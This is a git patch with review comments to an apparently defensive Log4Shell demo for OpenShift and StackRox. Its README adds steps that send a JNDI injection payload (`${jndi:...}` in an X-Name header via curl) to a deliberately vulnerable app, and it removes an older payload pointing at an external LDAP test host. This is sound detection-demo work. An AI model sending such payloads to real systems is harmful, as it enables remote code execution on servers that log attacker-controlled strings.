From 79c27102ce80aea91a8604f8d8ba3cb1227100d5 Mon Sep 17 00:00:00 2001 From: Nicolas MASSE Date: Wed, 23 Feb 2022 17:39:18 +0100 Subject: [PATCH] fix pipeline notifications --- .gitignore | 2 + README.md | 48 ++++++++++++------- cicd/70-tasks.yaml | 2 +- ...log4shell.json => log4shell.json.template} | 5 +- 4 files changed, 36 insertions(+), 21 deletions(-) rename policy/{log4shell.json => log4shell.json.template} (96%) diff --git a/.gitignore b/.gitignore index 4b40ff6..5d8a648 100644 --- a/.gitignore +++ b/.gitignore @@ -1,2 +1,4 @@ dockercfg *.bak +log4shell.json + diff --git a/README.md b/README.md index e22a4d9..d8d22b5 100644 --- a/README.md +++ b/README.md @@ -165,6 +165,12 @@ Deploy the vulnerable app. oc kustomize deployment | oc apply -f - ``` +Run the cleanup script. + +``` +ansible-playbook cleanup/cleanup.yaml +``` + ## Demo scenario ### Build the inventory @@ -178,7 +184,29 @@ oc kustomize deployment | oc apply -f - ### Intrusion -* In a hidden terminal, run the JNDI Exploit Kit to trigger the "Shell spawned by Java application" policy +In a hidden terminal, run the JNDI Exploit Kit to trigger the "Shell spawned by Java application" policy + +* Get the RMI URL with: + + ```sh + oc logs -n exploitkit-log4j deploy/jndi-exploit-kit |grep -A1 "BYPASS WITH EL by @welk1n" + EXPLOIT_URL="$(oc logs -n exploitkit-log4j deploy/jndi-exploit-kit | grep -A1 "BYPASS WITH EL by @welk1n" | grep rmi:// | sed 's/\x1B\[[0-9;]\{1,\}[A-Za-z]//g')" + ``` + +* Find the URL of the vulnerable container. + + ```sh + export TARGET="https://$(oc get route settlement-app -n vulnerable-log4j -o jsonpath="{.spec.host}")/" + ``` + +* Send the exploit + + ```sh + curl "$TARGET" -H "X-Name: \${jndi:$EXPLOIT_URL}" + ``` + +Then, show the violation: + * Open the **Violations** tab * Filter by **Namespace**: `vulnerable-log4j` * Go to the OpenShift console 
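Review bot: The new ignore pattern `log4shell.json` is unanchored, so it hides any file of that name anywhere in the tree, not only the rendered `policy/log4shell.json` that this commit replaces with a template; `/policy/log4shell.json` limits it to the generated artifact. The empty line added after the pattern has no effect and can be dropped.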
@@ -186,7 +214,7 @@ oc kustomize deployment | oc apply -f - * Delete the pod * In the Central, clear the Violation * Drill down to **Platform Configuration** > **System policies** -* Open the **Log4Shell** policy +* Open the **Shell Spawned by Java Application** policy * Click the **Edit** button * On the fourth tab, show the automatic enforcement options @@ -241,20 +269,6 @@ Cleanup ```sh oc kustomize deployment | oc delete -f - -oc delete pods -n vulnerable-cicd --all +oc delete pods,builds,pipelineruns -n vulnerable-cicd --all oc start-build vulnerable-log4j -n vulnerable-cicd ``` - -## Exploit - -Find the URL of the vulnerable container. - -```sh -export TARGET="https://$(oc get route settlement-app -n vulnerable-log4j -o jsonpath="{.spec.host}")/" -``` - -Go to https://log4shell.huntress.com/ and pass the generated string in the `X-Name` HTTP header. - -```sh -curl "$TARGET" -H 'X-Name: ${jndi:ldap://log4shell.huntress.com:1389/e597d75d-1851-4133-9a08-d5dfd7e04264}' -``` diff --git a/cicd/70-tasks.yaml b/cicd/70-tasks.yaml index 0b78e3e..7728a01 100644 --- a/cicd/70-tasks.yaml +++ b/cicd/70-tasks.yaml @@ -89,4 +89,4 @@ spec: NAME=`skopeo inspect "docker://$(params.image)" --format '{{.Name}}' --creds token:$TOKEN` curl -s -k -L -H "Authorization: Bearer $ROX_API_TOKEN" "https://$ROX_CENTRAL_ENDPOINT/api/cli/download/roxctl-linux" --output /tmp/roxctl > /dev/null chmod +x /tmp/roxctl - /tmp/roxctl image check --insecure-skip-tls-verify -e "$ROX_CENTRAL_ENDPOINT" --image "$NAME@$DIGEST" + /tmp/roxctl image check --insecure-skip-tls-verify -e "$ROX_CENTRAL_ENDPOINT" --image "$NAME@$DIGEST" --send-notifications diff --git a/policy/log4shell.json b/policy/log4shell.json.template similarity index 96% rename from policy/log4shell.json rename to policy/log4shell.json.template index fa2fc90..eb7efa1 100644 --- a/policy/log4shell.json +++ b/policy/log4shell.json.template 
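Review bot: The rewritten `roxctl image check` line keeps `--insecure-skip-tls-verify` while now also dispatching notifications, and the binary it executes was fetched on the preceding context line with `curl -k` and no integrity check, so the scan verdict and the alerts it sends both rest on an unauthenticated connection to Central. Mounting Central's CA into the task and passing it with roxctl's `--ca` option (dropping the skip flag, and `-k` on the download) would close that, and verifying a checksum of `/tmp/roxctl` before `chmod +x` would cover the download itself. Separately, `curl -s` without `-f` writes an HTTP error body to `/tmp/roxctl` on a failed download, which then surfaces only as an exec error on this line; `curl -sfL` fails the step early instead. The task's script block begins before this hunk.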
@@ -1,7 +1,6 @@
 {
 "policies": [
 {
- "id": "7f0ef11c-f9b1-4af1-9181-e24b1c27285c",
 "name": "Log4Shell",
 "description": "Alert on deployments with images containing the Log4Shell vulnerabilities (CVE-2021-44228 and CVE-2021-45046). There are flaws in the Java logging library Apache Log4j in versions from 2.0-beta9 to 2.15.0, excluding 2.12.2.",
 "rationale": "These vulnerabilities allows a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup.",
@@ -24,7 +23,7 @@
 "FAIL_BUILD_ENFORCEMENT"
 ],
 "notifiers": [
- "27197fcf-5d2c-4fb6-a9bd-9e755f739944"
+ "{{ notifier_id }}"
 ],
 "lastUpdated": "2022-02-21T14:19:19.206939932Z",
 "SORTName": "",
@@ -67,4 +66,4 @@
 "isDefault": false
 }
 ]
-}
\ No newline at end of file
+}
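Review bot: With `id` removed, the policy is identified on import only by its `name`, so re-running the provisioning step against a Central that already holds a `Log4Shell` policy will either be rejected or produce a second copy depending on the import options used (not visible from here); documenting the expected re-import behaviour next to the template, or deleting the old policy in the cleanup playbook, would make this deterministic. The `lastUpdated` timestamp kept as context in the second hunk is server-managed metadata like `id`; dropping it as well keeps the template to the fields the repository actually authors.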
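Review bot: `{{ notifier_id }}` is quoted, so the rendered file stays valid JSON, but nothing here rejects an empty or undefined value: a rendering with the variable unset yields a well-formed policy whose `notifiers` entry is `""`, which imports without a notifier and makes the pipeline's new `--send-notifications` deliver nothing. If this is rendered with Ansible, as the README's `ansible-playbook` invocation suggests, `{{ notifier_id | mandatory }}` turns the missing variable into a hard failure at render time rather than a silently muted policy.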